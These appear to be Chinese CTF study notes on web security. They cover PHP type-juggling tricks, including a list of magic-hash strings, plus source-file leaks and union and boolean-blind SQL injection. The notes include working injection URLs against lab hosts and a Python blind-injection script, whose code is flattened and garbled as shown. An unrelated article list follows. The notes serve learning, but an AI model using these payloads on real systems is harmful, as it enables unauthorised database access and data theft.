web安全基础学习笔记

这里写目录标题

  • 1.使用hackbar
  • 2.php漏洞基本分析 弱类型语言
    • 2.2 php漏洞找到隐藏的源代码之 index.php~
    • 2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp
    • 3.php漏洞基本分析 数组
  • 3.php漏洞基本分析 extract
  • 4.php漏洞基本分析 strpos eregi函数漏洞
  • 4.php漏洞基本分析 eregi函数漏洞
  • 5.SQL注入漏洞分析
    • 5.1 整数型 联合注入
      • 5.1.1 判断注入点
      • 5.1.2 判断列数
      • 5.1.3 查询库名
      • 5.1.4 查询表名
      • 5.1.4 查询数据库列名
      • 5.1.4 查询结果
    • 5.1 字符型 联合注入
    • 5.3 布尔盲注
      • 盲注常用函数
      • 编写布尔盲注脚本
  • 6 SQL注入实操
  • 7 PHP反序列化漏洞分析与实操讲解
  • 8 文件上传漏洞

1.使用hackbar

通过hackbar在浏览器发送请求包就能得到请求内容。
在这里插入图片描述

2.php漏洞基本分析 弱类型语言

在这里插入图片描述
如果字符串跟数字匹配会自动转换成数字。
在这里插入图片描述
案例
在这里插入图片描述

2.2 php漏洞找到隐藏的源代码之 index.php~

index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对) 使用index.php~下载到源代码
在这里插入图片描述
下载到源文件后发现代码需要输入两个相同的md5进行判断才给通过。所以这道题可以用0e开头的md5进行绕过。

处理hash字符串时,PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同

下面是一些哈希后0E开头的字符

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708 
0e462097431906509019562988736854
314282422 
0e990995504821699494520356953734
571579406 
0e972379832854295224118025748221
903251147 
0e174510503823932942361353209384
1110242161 
0e435874558488625891324861198103
1320830526 
0e912095958985483346995414060832
1586264293 
0e622743671155995737639662718498
2302756269 
0e250566888497473798724426794462
2427435592 
0e067696952328669732475498472343
2653531602 
0e877487522341544758028810610885
3293867441 
0e471001201303602543921144570260
3295421201 
0e703870333002232681239618856220
3465814713 
0e258631645650999664521705537122
3524854780 
0e507419062489887827087815735195
3908336290 
0e807624498959190415881248245271
4011627063 
0e485805687034439905938362701775
4775635065 
0e998212089946640967599450361168
4790555361 
0e643442214660994430134492464512
5432453531 
0e512318699085881630861890526097
5579679820 
0e877622011730221803461740184915
5585393579 
0e664357355382305805992765337023
6376552501 
0e165886706997482187870215578015
7124129977 
0e500007361044747804682122060876
7197546197 
0e915188576072469101457315675502
7656486157 
0e451569119711843337267091732412
QLTHNDT 
0e405967825401955372549139051580
QNKCDZO 
0e830400451993494058024219903391
EEIZDOI 
0e782601363539291779881938479162
TUFEPMC 
0e839407194569345277863905212547
UTIPEZQ 
0e382098788231234954670291303879
UYXFLOI 
0e552539585246568817348686838809
IHKFRNS 
0e256160682445802696926137988570
PJNPDWY 
0e291529052894702774557631701704
ABJIHVY 
0e755264355178451322893275696586
DQWRASX 
0e742373665639232907775599582643
DYAXWCA 
0e424759758842488633464374063001
GEGHBXL 
0e248776895502908863709684713578
GGHMVOE 
0e362766013028313274586933780773
GZECLQZ 
0e537612333747236407713628225676
NWWKITQ 
0e763082070976038347657360817689
NOOPCJF 
0e818888003657176127862245791911
MAUXXQC 
0e478478466848439040434801845361
MMHUWUV 
0e701732711630150438129209816536

2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp

用户在使用vim编辑,意外退出时,会在当前目录生成备份文件

以 index.php 为例 第一次产生的缓存文件名为 .index.php.swp
第二次意外退出后,文件名为.index.php.swo
第三次产生的缓存文件则为 .index.php.swn
注意:index前有 " . "
在这里插入图片描述

3.php漏洞基本分析 数组

在这里插入图片描述
题目要求输入的v3必须跟flag的一致才能给你返回。
php的某些函数是不能输入数组的,如果强行输入数组会返回一个null,而在php中对null中取非他就是True.

只要看到一个只能接收字符串的输入,就往里面灌入一个其他类型的函数,可能会有意想不到的结果。

这道题也是一样只要注入一个不同的数组就能得到结果。

/?v1[]=1&v2[]=2&v3[]=3 直接灌入数组

在这里插入图片描述

3.php漏洞基本分析 extract

extract 把数组转换成变量名和变量值的生命。
在这里插入图片描述

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

这道题可以通过强行传入数组或者传入空值来解决。

/extract.php/?aurora&flage 直接不写内容就是空

4.php漏洞基本分析 strpos eregi函数漏洞

案例
在这里插入图片描述
这道题可以用数组绕过。

4.php漏洞基本分析 eregi函数漏洞

eregi函数在进行匹配的时候,如果碰到%00会意味着字符串的结束,因此我们只需要传入%001234,他截取到%00后匹配的时候就会变成111,111在1114中,成功绕过

案例 https://blog.csdn.net/m0_52432374/article/details/113647955?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-113647955-blog-124258277.235^v43^control&spm=1001.2101.3001.4242.1&utm_relevant_index=3

5.SQL注入漏洞分析

只要通过让他的语句结果为真就可以进行注入,找到注入点让他的结果不一样
在这里插入图片描述

5.1 整数型 联合注入

5.1.1 判断注入点

条件1 回显结果到网页
在这里插入图片描述
案例页面 输入的结果可以显示到网页中。
在这里插入图片描述
他的注入点就在输入的地方。在原来数据查询的基础上增加一个条件,同时要求他这个条件成立。

/1.php?id=2 and 1=0 通过在注入点后面增加sql语句就可以发现原始的sql有没有拼接我们新加进去的语句。如果加进去了就证明注入点可用。

5.1.2 判断列数

通过拼接order by来猜测数据有多少列,因为超过后会直接报错。

?id=2 order by 4

5.1.3 查询库名

通过拼接 union 来查询数据库名

/1.php?id=0 union select 1,2,database()

在这里插入图片描述

5.1.4 查询表名

在这里插入图片描述

通过之前查询出来的数据库,查询这个库里面的全部表
/1.php?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where%20table_schema= ‘ctf’

5.1.4 查询数据库列名

/1.php?id=0 UNION SELECT 1,2,group_concat(COLUMN_NAME) FROM information_schema.columns WHERE table_name = ‘answer’

在这里插入图片描述

5.1.4 查询结果

/1.php?id=0 UNION select 1,2,flag from answer

在这里插入图片描述

5.1 字符型 联合注入

把内容加成了字符型,如果使用之前的1=1的方式会被带成一个整体带入请求里面也就是字符串。
在这里插入图片描述
解决方案
在这里插入图片描述
跟之前的方式一样,不过要添加一个闭合引号以及注释引号
在这里插入图片描述
步骤还是跟之前的一样就是添加了几个引号
在这里插入图片描述

5.3 布尔盲注

没有结果的回显。
在这里插入图片描述
解决办法
在这里插入图片描述
案例

在这里插入图片描述
通过sql语句的返回真假 去猜测这个数据库的长度。
在这里插入图片描述

盲注常用函数

在这里插入图片描述
通过这些语句猜测数据库里面的库和表名,暴力破解的方式进行猜测。

编写布尔盲注脚本

使用盲注脚本进行暴力破解

# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ''(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)def GetDBName():# 获取数据库的长度print("----------测试数据库长度--------------")url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"for i in range(1, 99):current_url = url_template.format(i)response = requests.get(current_url, headers=headers)if re.search(r'You are in',response.text):len = iprint("数据库长度为:", i)break# 测试数据库名称print("----------测试数据库名--------------")DBname = ''url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"for i in range(1, len+1):for j in range(33, 127):# 拼接构造需要的测试的URL地址,通过format函数批量构造current_url1 = url_template1.format(i, j)
#            print(current_url1)# 发送请求response1 = requests.get(current_url1, headers=headers)# 判断是否成功if re.search(r'You are in', response1.text):DBname += chr(j)print("数据库名为:", DBname)breakif __name__ == '__main__':GetDBName()

6 SQL注入实操

找到列数后查询库名。

/?r=content&cid=0%27%20union%20select%201,2,3,4,5,6,7,8,9,10,database(),12,13%23
在这里插入图片描述

在查询他的表名

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13 from information_schema.tables where table_schema='cuni'%23

在这里插入图片描述
列名查询数

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,group_concat(COLUMN_NAME),12,13%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27adword%27%23union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13%20from%20information_schema.tables%20where%20table_schema=%27cuni%27%23

在这里插入图片描述

查询数据库内容

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' UNION select 1,2,3,4,5,6,7,8,9,10,date,12,13 from content %23

在这里插入图片描述

7 PHP反序列化漏洞分析与实操讲解

在这里插入图片描述
在这里插入图片描述

序列号只能序列化属性,不序列化方法在这里插入图片描述

在这里插入图片描述
样例
在这里插入图片描述
魔术方法介绍:https://blog.csdn.net/weixin_45954730/article/details/131861020在这里插入图片描述

8 文件上传漏洞

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/24062.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

携手星展银行,YonSuite财资管理助力企业“扬帆出海”

在全球经济一体化的浪潮下,越来越多的中国企业怀揣着“扬帆出海”的雄心壮志,积极开拓国际市场。然而,在海外市场面临的复杂环境和激烈竞争中,如何高效管理财务资金、优化资源配置、降低运营风险,成为摆在众多出海企业…

Qt图像处理技术十二:QImage实现边缘检测(sobel算法)

效果图 原理 Sobel算法是一种常用的边缘检测算法,它利用图像的灰度变化来检测图像中物体的边缘。Sobel算法主要包括以下几个步骤: 灰度化: 首先将彩色图像转换为灰度图像,因为灰度图像只包含单通道的灰度信息,有利于…

通过fiftyone按分类下载open-images-v7数据集,并转成yolov5可直接训练的格式

import osimport fiftyone as fo import fiftyone.zoo as foz import yamlclasses [Person, # 人 - 0Car, # 轿车 - 1Taxi, # 出租车 - 2Ambulance, # 救护车 - 3Bus, # 公共汽车 - 4Bicycle, # 自行车 - 5Motorcycle, # 摩托车 - 6Dog, # 狗 - 7Cat, # 猫 - 8M…

000002 - Hadoop环境安装

Hadoop及其大数据生态圈 1. 背景2. 实践2.1 Linux服务器准备2.2 在其中一台服务器上安装JDK2.3 在其中一台服务器上安装HADOOP2.4 本地模式运行一个hadoop案例 3. 自动化部署 1. 背景 要搭建Hadoop集群环境,我们需要执行如下 准备三台Linux服务器,服务…

Python实现日志的记录

1 日志 1、介绍 日志(Log)是一个记录事件或系统活动的文件或数据集,日志是系统管理员和开发者用于诊断问题、监视系统性能、以及追踪用户活动的关键工具。包含以下: 系统日志:记录操作系统、应用程序、硬件组件等的事…

lcd屏幕verilog显示

一,VGA原理和时序 计算机显示区的显示有许多标准,常见的有VGA、SVGA等。在这里我们用VGA接口来控制显示器,也就是视频图形阵列。作为一 种标准的显示接口得到广泛的应用。 常见的彩色显示器一般由 CRT(阴极射线管)构成,色彩是由R、G、B(红、黄、 蓝)三基色组成。显示是…

前端UI框架Element Plus 和 Ant Design Vue哪个好

Element Plus 和 Ant Design Vue 都是基于 Vue.js 的 UI 组件库,它们具备一系列可复用的组件和丰富的功能,并且是当前国内主流的两个 UI 组件库。 (1)Element Plus 是饿了么前端团队推出的开源项目,是对 Element UI 的…

completefuture造成的rpc重试事故

前言 最近经历了一个由于 completefuture 的使用,导致RPC重试机制触发而引起的重复写入异常的生产bug。复盘下来,并非是错误的使用了completefuture,而是一些开发时很难意识到的坑。 背景 用户反馈通过应用A使用ota批量升级设备时存在概率…

文字游侠AI:一键创作头条爆文!(附渠道和保姆级教程)

在互联网的迅猛发展中,自媒体已然成为一条崭新的职业路径,吸引着越来越多的人通过各类平台分享观点与知识,同时获取相应的收益。今日头条便是一个极为出色的自媒体平台,旗下的图文项目更是一条实现收益的有效途径。 对于众多非专业…

【SpringBoot + Vue 尚庭公寓实战】租期管理接口实现(四)

【SpringBoot Vue 尚庭公寓实战】租期管理接口实现(四) 文章目录 【SpringBoot Vue 尚庭公寓实战】租期管理接口实现(四)1、查询全部租期列表2、保存或更新租期信息3、根据ID删除租期 租期管理共有三个接口,分别是 保…

IP纯净度对跨境电商有影响吗?

当我们谈论代理IP时,通常会提到一个重要概念,那就是“IP纯净度”。 IP纯净度是指代理IP服务中所提供的IP地址的质量、干净程度和安全性,纯净度高的IP地址通常具备低恶意软件攻击的风险、良好的访问效果、稳定性和速度以及隐私保护等特点。在…

动态内存管理(malloc,calloc,realloc,free)+经典笔试题

动态内存管理 一. malloc 和 free1. malloc2. free 二. calloc三. realloc四.动态内存的错误1.对NULL指针的解引用操作2.对动态开辟空间的越界访问3.对非动态开辟内存使用free释放4.使用free释放一块动态开辟内存的一部分5.对同一块动态内存多次释放6.动态开辟内存忘记释放&…

python连接Mongodb数据库,报错:pymongo.errors.ServerSelectionTimeoutError

python连接mongdb数据库,本来是可以的,但是研发更换新的数据库后,一直报错:pymongo.errors.ServerSelectionTimeoutError,但是在其他人电脑上脚本执行成功。 详见报错截图: 在网上找了很久的解决方案&…

图标绘制软件draw.io中文安装包

Draw.io(也称为Diagrams)是一款功能强大的免费在线图表绘制工具。它支持绘制多种类型的图表,如流程图、UML图、组织结构图等,满足了从商务到工程设计的多领域需求。软件界面直观友好,操作简单,用户无需安装…

【网络基础1】

文章目录 学习目标一、网络基础11.网络的重要性2.osi7层模式3.协议和osi7层模型的关系4.数据的封装和解封装5.tcp的三次握手6.Ddos攻击讲解7.Tcp的四次挥手 二、网络基础21.文字编码2.IP地址的划分3.子网掩码4.同网段ip才能直接通信5.DNS解析6.DNS解析命令7.短域名为什么值钱8.…

docker命令 docker ps -l (latest)命令在 Docker 中用于列出最近一次创建的容器

文章目录 12345 1 docker ps -l 命令在 Docker 中用于列出最近一次创建的容器。具体来说: docker ps:这个命令用于列出当前正在运行的容器。-l 或 --latest:这个选项告诉 docker ps 命令只显示最近一次创建的容器,不论该容器当前…

Python代码限定抽奖次数的方法

在许多应用场景中,抽奖活动需要限定参与次数以确保公平性和控制成本。本文将介绍如何使用Python代码实现抽奖次数的限定。我们将讨论基本的实现方法,并展示一个完整的代码示例。 基本思路 限定抽奖次数的基本思路是使用一个计数器来记录每个用户已经参…

png怎么变成jpg?教你3种方法一键批量转换

png怎么变成jpg?PNG转JPG在图像处理中扮演着重要的角色。除了能够显著减小文件大小,使图像更易于分享和传输外,这种转换还能确保图像在各种平台和设备上都能得到良好的展示效果。无论是网站加载速度的优化,还是移动设备上的流畅浏…

windows 系统通过 cmd 命令终止进程

windows 系统通过 cmd 命令终止进程 1、使用 netstat 命令查看特定端口的占用情况 例如,要查看端口号为 8015 的情况,可以执行以下命令: netstat -ano | findstr 8105此命令会显示所有占用端口 8105 的网络连接,并列出 PID&…

Shopee与Lazada卖家如何运用自养号测评稳定提升销量于评价

在跨境电商行业中,测评对于提高产品销量是个非常优秀的辅助方式。作为东南亚电商巨头,Shopee和Lazada这两大主流平台上,卖家竞争也尤为激烈,卖家们不断寻求有效的方法提升自己的产品销量。为了应对这一挑战,测评应运而…